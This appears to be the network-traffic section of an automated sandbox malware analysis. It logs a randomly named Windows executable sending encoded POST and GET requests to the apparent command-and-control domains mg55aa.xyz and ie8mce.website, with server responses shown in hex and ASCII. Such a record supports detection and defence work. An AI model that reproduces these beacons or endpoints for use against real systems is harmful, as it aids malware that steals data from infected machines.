                                      Jun 10, 2024 10:21:59.696134090 CEST708OUTPOST /2c61/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.mg55aa.xyz
                                      Content-Length: 208
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.mg55aa.xyz
                                      Referer: http://www.mg55aa.xyz/2c61/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Raw: 54 54 76 38 32 4c 67 3d 63 4c 33 79 37 59 30 36 5a 76 66 73 33 7a 50 72 4b 58 65 63 35 70 6d 52 49 32 66 52 37 4b 51 61 6d 44 39 59 42 62 2b 48 6c 4c 58 54 6e 68 7a 6f 42 4b 36 36 4d 61 46 76 6e 34 52 7a 50 49 51 47 54 74 65 69 67 45 79 58 6d 31 42 56 61 37 4b 54 35 54 47 69 7a 55 58 41 62 67 45 54 51 57 72 52 7a 38 42 36 66 33 41 6c 6e 33 79 69 4b 57 34 2b 73 6e 71 72 67 42 74 71 61 73 66 39 68 46 6e 7a 6f 35 49 48 65 6f 59 7a 74 7a 59 4e 77 32 79 53 74 63 7a 55 71 74 41 75 56 32 48 69 62 79 72 51 33 45 53 6b 35 4e 4f 64 65 52 44 76 34 51 41 4a 36 70 55 59 4d 58 47 75 6c 42 61 35 59 39 4d 33 35 33 2b 64 6a 4a 63 3d
                                      Data Ascii: TTv82Lg=cL3y7Y06Zvfs3zPrKXec5pmRI2fR7KQamD9YBb+HlLXTnhzoBK66MaFvn4RzPIQGTteigEyXm1BVa7KT5TGizUXAbgETQWrRz8B6f3Aln3yiKW4+snqrgBtqasf9hFnzo5IHeoYztzYNw2yStczUqtAuV2HibyrQ3ESk5NOdeRDv4QAJ6pUYMXGulBa5Y9M353+djJc=
                                      Jun 10, 2024 10:22:00.448599100 CEST326INHTTP/1.1 405 Not Allowed
                                      Server: nginx/1.20.2
                                      Date: Mon, 10 Jun 2024 08:22:00 GMT
                                      Content-Type: text/html
                                      Content-Length: 157
                                      Via: 1.1 google
                                      Connection: close
                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      18192.168.2.55138435.241.34.216802608C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 10, 2024 10:22:02.245327950 CEST728OUTPOST /2c61/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.mg55aa.xyz
                                      Content-Length: 228
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.mg55aa.xyz
                                      Referer: http://www.mg55aa.xyz/2c61/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Raw: 54 54 76 38 32 4c 67 3d 63 4c 33 79 37 59 30 36 5a 76 66 73 32 53 2f 72 46 51 79 63 6f 35 6d 53 55 6d 66 52 77 71 51 65 6d 44 35 59 42 61 71 58 6c 39 76 54 70 67 44 6f 41 4c 36 36 46 4b 46 76 2b 49 52 32 51 59 51 42 54 74 43 71 67 46 4f 58 6d 31 46 56 61 36 36 54 36 69 47 68 78 45 58 43 41 51 45 56 61 32 72 52 7a 38 42 36 66 33 55 50 6e 30 43 69 4e 6d 6f 2b 76 47 71 6b 2f 78 74 70 64 73 66 39 33 31 6d 30 6f 35 49 78 65 70 30 4b 74 31 55 4e 77 7a 32 53 74 4e 7a 58 67 74 41 73 49 6d 48 77 59 44 71 4c 39 46 4f 33 30 4d 6e 6b 66 6e 4b 55 77 47 74 6a 67 4c 63 77 66 33 71 57 31 53 53 4f 4a 4e 74 65 6a 55 75 74 39 65 4c 65 59 44 61 72 62 31 4b 33 47 62 54 78 51 58 34 69 74 68 6c 2b
                                      Data Ascii: TTv82Lg=cL3y7Y06Zvfs2S/rFQyco5mSUmfRwqQemD5YBaqXl9vTpgDoAL66FKFv+IR2QYQBTtCqgFOXm1FVa66T6iGhxEXCAQEVa2rRz8B6f3UPn0CiNmo+vGqk/xtpdsf931m0o5Ixep0Kt1UNwz2StNzXgtAsImHwYDqL9FO30MnkfnKUwGtjgLcwf3qW1SSOJNtejUut9eLeYDarb1K3GbTxQX4ithl+
                                      Jun 10, 2024 10:22:03.012447119 CEST326INHTTP/1.1 405 Not Allowed
                                      Server: nginx/1.20.2
                                      Date: Mon, 10 Jun 2024 08:22:02 GMT
                                      Content-Type: text/html
                                      Content-Length: 157
                                      Via: 1.1 google
                                      Connection: close
                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      19192.168.2.55138535.241.34.216802608C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 10, 2024 10:22:04.777486086 CEST1745OUTPOST /2c61/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.mg55aa.xyz
                                      Content-Length: 1244
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.mg55aa.xyz
                                      Referer: http://www.mg55aa.xyz/2c61/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Raw: 54 54 76 38 32 4c 67 3d 63 4c 33 79 37 59 30 36 5a 76 66 73 32 53 2f 72 46 51 79 63 6f 35 6d 53 55 6d 66 52 77 71 51 65 6d 44 35 59 42 61 71 58 6c 2b 50 54 70 53 4c 6f 42 6f 69 36 58 61 46 76 68 34 52 33 51 59 51 63 54 74 61 75 67 46 43 48 6d 33 4e 56 63 5a 69 54 37 51 75 68 72 55 58 43 49 77 45 55 51 57 71 52 7a 34 74 2b 66 33 45 50 6e 30 43 69 4e 6a 73 2b 35 6e 71 6b 73 68 74 71 61 73 66 78 68 46 6d 51 6f 35 51 50 65 70 77 61 74 46 30 4e 77 54 6d 53 72 2f 62 58 6d 39 41 71 62 57 47 6a 59 47 79 75 39 46 53 46 30 4d 54 43 66 67 47 55 68 6e 55 4a 6c 4c 45 36 44 32 36 67 34 78 43 6a 52 64 64 6c 2b 55 71 72 69 5a 66 6d 45 41 69 4a 54 67 2f 32 4e 6f 65 45 42 52 38 75 6f 6c 41 76 66 2f 52 51 70 72 51 4e 51 57 79 4a 4d 68 6f 55 4c 6b 56 73 33 30 38 62 48 56 51 33 43 77 78 4c 71 72 52 77 37 33 68 47 36 45 6c 4b 65 42 56 2f 53 58 2b 6f 4d 67 63 53 54 73 76 78 63 58 30 77 67 33 50 2f 54 37 47 2b 57 50 6f 2f 63 50 72 74 37 61 76 30 6c 6c 6f 65 43 51 45 6d 4a 57 58 2b 6f 73 42 36 58 36 74 2b 41 75 56 30 66 75 [TRUNCATED]
                                      Data Ascii: TTv82Lg=cL3y7Y06Zvfs2S/rFQyco5mSUmfRwqQemD5YBaqXl+PTpSLoBoi6XaFvh4R3QYQcTtaugFCHm3NVcZiT7QuhrUXCIwEUQWqRz4t+f3EPn0CiNjs+5nqkshtqasfxhFmQo5QPepwatF0NwTmSr/bXm9AqbWGjYGyu9FSF0MTCfgGUhnUJlLE6D26g4xCjRddl+UqriZfmEAiJTg/2NoeEBR8uolAvf/RQprQNQWyJMhoULkVs308bHVQ3CwxLqrRw73hG6ElKeBV/SX+oMgcSTsvxcX0wg3P/T7G+WPo/cPrt7av0lloeCQEmJWX+osB6X6t+AuV0fuqrQ6l5dWMYn5Bl7LVslhQFdg7pmnsJdNnRFRAQ/Meh+feWO0fatbrzg/01MpS0vFKwngI5Qb1FTCIgc4f/PhQfzUEk9iUtWc2OobtAColXSoWiqbexn8rXnMpeN9gHb7K2QFZMH/Z9vWyJoigl3fmcMQdvPpdnUFlaCB2Nlh/zxmWqIwBf5zTek/Qr3i9p3C6g5htj/LUiZQ3rCy1Fj/7CkqgryxcU7PsGpyjV40xnVNvq+nd4rCLVC/m3rYgjqOPYCVdU/O4YCHMUpV/RRqnPmQDrG1Ium5an4rPC465mBc9Y0J8x2EQfT2HQlOUWQdPfOAvB+3dkM5CoX+f5DvQ3Kk6l+hLhA16sfk3s2kNbItm97tgZoTW719jJFfJaliD/6/EiWDOQ/Dl5pGUG2K+6wxTm3jJrIDEhmbyuXirKKKDzWnTRaZojtvfti2Y7S3mdJVMwHKaFiQSEQ9NBT8942W+I4+d1bWqiI2MIH2Kbgwu5ZAUlS8ipKH8LFspsj0I+K/BxzvMfeXLtvQU7ZHxtZfrslSVBXNV3y97LPxm+75qwoiwMy0yJjaOU158JtgZMR0K99pGWQgkkNT0co+PI2sf1ybVa92MwJsatwLuDnKd38PeM5VQudjsJfORx7Sj7tn3Kj8i5u2AnW+Z5WMS/IUpOAfPHBROt [TRUNCATED]
                                      Jun 10, 2024 10:22:05.536735058 CEST326INHTTP/1.1 405 Not Allowed
                                      Server: nginx/1.20.2
                                      Date: Mon, 10 Jun 2024 08:22:05 GMT
                                      Content-Type: text/html
                                      Content-Length: 157
                                      Via: 1.1 google
                                      Connection: close
                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      20192.168.2.55138635.241.34.216802608C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 10, 2024 10:22:07.327341080 CEST453OUTGET /2c61/?TTv82Lg=RJfS4vARZYm/oi22NSuVxsKXUXvAzLUuwV1pBI27iejWxHvYHo2LN7gu8qRYW6QqNtSAiHHGlyBTLaey7TeG8lKmZ3wdB0uWw8RQPkcPoCC9P3J1+WeEqjNfAM7KpTz+0w==&kH=00U8ENLHk HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.mg55aa.xyz
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Jun 10, 2024 10:22:08.098787069 CEST1236INHTTP/1.1 200 OK
                                      Server: nginx/1.20.2
                                      Date: Mon, 10 Jun 2024 08:22:07 GMT
                                      Content-Type: text/html
                                      Content-Length: 5161
                                      Last-Modified: Mon, 15 Jan 2024 02:08:28 GMT
                                      Vary: Accept-Encoding
                                      ETag: "65a4939c-1429"
                                      Cache-Control: no-cache
                                      Accept-Ranges: bytes
                                      Via: 1.1 google
                                      Connection: close
                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 6c 69 63 64 6e 2e 63 6f 6d 2f 77 6f 6f 64 70 65 63 6b 65 72 78 2f 6a 73 73 64 6b 2f 77 70 6b 52 65 70 6f 72 74 65 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 74 72 75 65 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 6c 69 63 64 6e 2e 63 6f 6d 2f 77 6f 6f 64 70 65 63 6b 65 72 78 2f 6a 73 73 64 6b 2f 70 6c 75 67 69 6e 73 2f 67 6c 6f 62 61 6c 65 72 72 6f 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 [TRUNCATED]
                                      Data Ascii: <!doctype html><html lang="zh"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><script src="https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js" crossorigin="true"></script><script src="https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js" crossorigin="true"></script><script src="https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js" crossorigin="true"></script><script>window.wpkReporter&&(window.wpk=new window.wpkReporter({bid:"berg-download",rel:"2.42.1",sampleRate:1,plugins:[[window.wpkglobalerrorPlugin,{jsErr:!0,jsErrSampleRate:1,resErr:!0,resErrSampleRate:1}],[window.wpkperformancePlugin,{enable:!0,sampleRate:.5}]]}),window.wpk.install())</script><script>function loadBaiduHmt(t){console.log("",t);var e=document.createElement("script");e.src="https://hm.baidu.com/hm.js?"+t;var o=document.getElementsByTagName("s
                                      Jun 10, 2024 10:22:08.098803043 CEST1236INData Raw: 63 72 69 70 74 22 29 5b 30 5d 3b 6f 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 65 2c 6f 29 7d 66 75 6e 63 74 69 6f 6e 20 62 61 69 64 75 50 75 73 68 28 74 2c 65 2c 6f 29 7b 77 69 6e 64 6f 77 2e 5f 68 6d 74 2e 70 75
                                      Data Ascii: cript")[0];o.parentNode.insertBefore(e,o)}function baiduPush(t,e,o){window._hmt.push(["_trackEvent",t,e,o])}console.log("..."),window._hmt=window._hmt||[];const BUILD_ENV="quark",token="42296466acbd6a1e84224ab1433a06cc"
                                      Jun 10, 2024 10:22:08.098814011 CEST356INData Raw: 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2c 69 73 55 43 3a 65 28 29 2c 69 73 51 75 61 72 6b 3a 72 28 29 2c 69 73 5f 64 75 61 6e 6e 65 69 3a 65 28 29 7c 7c 72 28 29 7d 2c 6e 29 2c 74 3d 5b 5d 3b 66 6f 72 28 76 61 72 20 69 20 69 6e 20
                                      Data Ascii: avigator.userAgent,isUC:e(),isQuark:r(),is_duannei:e()||r()},n),t=[];for(var i in a)a.hasOwnProperty(i)&&t.push("".concat(encodeURIComponent(i),"=").concat(encodeURIComponent(a[i])));var c=t.join("&").replace(/%20/g,"+"),s="".concat("https://t
                                      Jun 10, 2024 10:22:08.102224112 CEST1236INData Raw: 22 3d 3d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 77 69 6e 64 6f 77 2e 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 75 63 77 65 62 3f
                                      Data Ascii: "===function(){var n=window.navigator.userAgent.toLowerCase();return window.ucweb?"android":n.match(/ios/i)||n.match(/ipad/i)||n.match(/iphone/i)?"iphone":n.match(/android/i)||n.match(/apad/i)?"android":window.ucbrowser?"iphone":"unknown"}()&&
                                      Jun 10, 2024 10:22:08.102235079 CEST1236INData Raw: 6d 69 6e 2d 33 2e 33 2e 30 2e 6a 73 22 29 2c 24 68 65 61 64 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 24 73 63 72 69 70 74 31 2c 24 68 65 61 64 2e 6c 61 73 74 43 68 69 6c 64 29 2c 24 73 63 72 69 70 74 31 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69
                                      Data Ascii: min-3.3.0.js"),$head.insertBefore($script1,$head.lastChild),$script1.onload=function(){var e=document.createElement("script");e.setAttribute("crossorigin","anonymous"),e.setAttribute("src","//image.uc.cn/s/uae/g/01/welfareagency/js/vconsle.js"
                                      Jun 10, 2024 10:22:08.102243900 CEST161INData Raw: b2 be e5 bd a9 e8 a7 86 e9 a2 91 e5 ad 98 e5 85 a5 e7 bd 91 e7 9b 98 e9 9a 8f e6 97 b6 e7 9c 8b 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 69 6d 61 67 65 2e 75 63 2e 63 6e 2f 73 2f 75 61 65
                                      Data Ascii: </div></div><script src="https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js"></script></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      21192.168.2.551387176.113.70.180802608C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 10, 2024 10:22:13.955416918 CEST720OUTPOST /3osa/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.ie8mce.website
                                      Content-Length: 208
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.ie8mce.website
                                      Referer: http://www.ie8mce.website/3osa/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Raw: 54 54 76 38 32 4c 67 3d 4e 7a 6a 31 4e 6f 30 5a 54 2f 57 4b 75 44 75 74 79 42 79 6a 79 6c 30 73 54 7a 41 58 75 2b 52 57 75 35 65 59 53 39 31 37 49 57 47 37 4c 48 41 43 34 54 45 78 63 72 6a 58 79 44 6e 34 77 4e 70 2b 72 79 76 55 43 78 42 73 54 47 35 64 70 6e 65 70 4f 6b 6b 49 33 62 4b 47 6e 77 78 38 4c 35 71 5a 4a 7a 4e 7a 4e 5a 50 2f 58 49 35 75 4d 62 32 6e 4f 66 2b 4e 30 37 75 57 76 70 66 62 45 37 56 36 51 56 47 52 45 44 64 4b 78 61 31 33 4a 73 79 50 4e 4b 6c 68 47 57 4a 64 7a 7a 41 75 67 30 52 46 4f 50 6e 52 33 2f 6d 33 59 50 42 41 59 54 64 6d 79 57 76 78 2b 73 75 64 6b 39 67 4a 31 55 7a 64 63 5a 36 32 6d 2b 38 3d
                                      Data Ascii: TTv82Lg=Nzj1No0ZT/WKuDutyByjyl0sTzAXu+RWu5eYS917IWG7LHAC4TExcrjXyDn4wNp+ryvUCxBsTG5dpnepOkkI3bKGnwx8L5qZJzNzNZP/XI5uMb2nOf+N07uWvpfbE7V6QVGREDdKxa13JsyPNKlhGWJdzzAug0RFOPnR3/m3YPBAYTdmyWvx+sudk9gJ1UzdcZ62m+8=
                                      Jun 10, 2024 10:22:15.057029963 CEST570INHTTP/1.1 200 OK
                                      Server: nginx
                                      Date: Mon, 10 Jun 2024 08:22:14 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Vary: Accept-Encoding
                                      Content-Encoding: gzip
                                      Data Raw: 31 36 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 51 4d 6f c2 30 0c bd f3 2b a2 9c 8a 34 12 a0 a3 65 a3 65 12 d2 ae 9c 76 43 68 0a 89 4b 5a 91 96 25 2e 1a 1b fb ef 73 f9 18 cb 21 b1 ad 67 bf e7 97 cc a2 db cd 7b 99 05 65 e6 3d 46 27 73 80 8a 69 ab 7c 00 cc 79 8b c5 60 ca 09 71 2e 5b c4 fd 00 3e da f2 90 73 0f 85 87 60 39 d3 4d 8d 50 13 76 28 46 33 d6 fa 5d de c1 c2 b3 94 5f 65 e5 5d 21 74 e3 a4 87 6d 19 10 3c 67 72 de d1 f4 58 16 b4 2f f7 c8 f0 b8 87 9c 23 7c a2 ac d4 41 5d aa 9c 05 af 73 7e 1b 54 05 d1 06 f0 41 4c 46 62 a7 e4 78 34 4d 93 f8 31 16 55 e0 f3 4c 5e 5a 48 e3 2d 38 28 cf de ad 43 96 5f 9e d3 89 ad d6 b3 5e 54 b4 b5 c6 b2 a9 a3 3e fb a6 65 3b 98 75 04 32 8d 6e 1d ad 20 b4 07 85 f0 ba 83 2e 8b f8 55 4b 7f 46 60 eb 04 49 22 f0 9f 28 aa 6c 54 69 da f3 7e 94 54 e1 25 99 24 93 d1 93 49 37 26 9e a8 b8 18 c7 71 0a 43 ad 13 9d 9a e9 d4 6c c6 bc 9b d4 d1 86 ff ac 5b c0 2b 65 58 1c df d4 76 a9 1c dc c9 57 c3 f5 8c ec 62 41 ec 95 27 59 cb c6 80 28 6b b2 03 17 50 34 1e 22 eb 1e 58 20 91 3f fd 88 ee bb [TRUNCATED]
                                      Data Ascii: 161MQMo0+4eevChKZ%.s!g{e=F'si|y`q.[>s`9MPv(F3]_e]!tm<grX/#|A]s~TALFbx4M1UL^ZH-8(C_^T>e;u2n .UKF`I"(lTi~T%$I7&qCl[+eXvWbA'Y(kP4"X ?ns$chv0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      22192.168.2.551388176.113.70.180802608C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 10, 2024 10:22:16.658775091 CEST740OUTPOST /3osa/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.ie8mce.website
                                      Content-Length: 228
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.ie8mce.website
                                      Referer: http://www.ie8mce.website/3osa/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Raw: 54 54 76 38 32 4c 67 3d 4e 7a 6a 31 4e 6f 30 5a 54 2f 57 4b 30 6a 65 74 77 67 79 6a 6c 56 30 76 4e 6a 41 58 6b 65 52 53 75 35 53 59 53 38 78 72 49 6c 69 37 4d 6c 49 43 37 58 6f 78 4d 37 6a 58 71 54 6e 39 2b 74 70 6c 72 79 71 70 43 30 35 73 54 43 70 64 70 6c 47 70 50 58 38 50 6c 62 4b 2b 2b 67 78 2b 46 5a 71 5a 4a 7a 4e 7a 4e 5a 61 59 58 4d 56 75 4e 6f 65 6e 50 2b 2b 43 2b 62 75 56 6c 4a 66 62 53 4c 55 7a 51 56 47 76 45 43 78 67 78 59 39 33 4a 75 36 50 4e 59 64 67 4e 57 4a 48 74 7a 42 41 77 6b 4d 79 42 73 6e 74 2b 39 50 59 4f 4e 5a 70 64 6c 77 4d 6f 30 6e 5a 74 4d 43 6c 30 75 6f 2b 6b 6b 53 30 47 36 71 47 34 70 70 48 74 47 33 2f 52 46 55 66 73 43 36 4a 32 48 4f 49 35 70 62 72
                                      Data Ascii: TTv82Lg=Nzj1No0ZT/WK0jetwgyjlV0vNjAXkeRSu5SYS8xrIli7MlIC7XoxM7jXqTn9+tplryqpC05sTCpdplGpPX8PlbK++gx+FZqZJzNzNZaYXMVuNoenP++C+buVlJfbSLUzQVGvECxgxY93Ju6PNYdgNWJHtzBAwkMyBsnt+9PYONZpdlwMo0nZtMCl0uo+kkS0G6qG4ppHtG3/RFUfsC6J2HOI5pbr
                                      Jun 10, 2024 10:22:17.611334085 CEST570INHTTP/1.1 200 OK
                                      Server: nginx
                                      Date: Mon, 10 Jun 2024 08:22:17 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Vary: Accept-Encoding
                                      Content-Encoding: gzip
                                      Data Raw: 31 36 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 51 4d 6f c2 30 0c bd f3 2b a2 9c 8a 34 12 a0 a3 65 a3 65 12 d2 ae 9c 76 43 68 0a 89 4b 5a 91 96 25 2e 1a 1b fb ef 73 f9 18 cb 21 b1 ad 67 bf e7 97 cc a2 db cd 7b 99 05 65 e6 3d 46 27 73 80 8a 69 ab 7c 00 cc 79 8b c5 60 ca 09 71 2e 5b c4 fd 00 3e da f2 90 73 0f 85 87 60 39 d3 4d 8d 50 13 76 28 46 33 d6 fa 5d de c1 c2 b3 94 5f 65 e5 5d 21 74 e3 a4 87 6d 19 10 3c 67 72 de d1 f4 58 16 b4 2f f7 c8 f0 b8 87 9c 23 7c a2 ac d4 41 5d aa 9c 05 af 73 7e 1b 54 05 d1 06 f0 41 4c 46 62 a7 e4 78 34 4d 93 f8 31 16 55 e0 f3 4c 5e 5a 48 e3 2d 38 28 cf de ad 43 96 5f 9e d3 89 ad d6 b3 5e 54 b4 b5 c6 b2 a9 a3 3e fb a6 65 3b 98 75 04 32 8d 6e 1d ad 20 b4 07 85 f0 ba 83 2e 8b f8 55 4b 7f 46 60 eb 04 49 22 f0 9f 28 aa 6c 54 69 da f3 7e 94 54 e1 25 99 24 93 d1 93 49 37 26 9e a8 b8 18 c7 71 0a 43 ad 13 9d 9a e9 d4 6c c6 bc 9b d4 d1 86 ff ac 5b c0 2b 65 58 1c df d4 76 a9 1c dc c9 57 c3 f5 8c ec 62 41 ec 95 27 59 cb c6 80 28 6b b2 03 17 50 34 1e 22 eb 1e 58 20 91 3f fd 88 ee bb [TRUNCATED]
                                      Data Ascii: 161MQMo0+4eevChKZ%.s!g{e=F'si|y`q.[>s`9MPv(F3]_e]!tm<grX/#|A]s~TALFbx4M1UL^ZH-8(C_^T>e;u2n .UKF`I"(lTi~T%$I7&qCl[+eXvWbA'Y(kP4"X ?ns$chv0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      23192.168.2.551389176.113.70.180802608C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
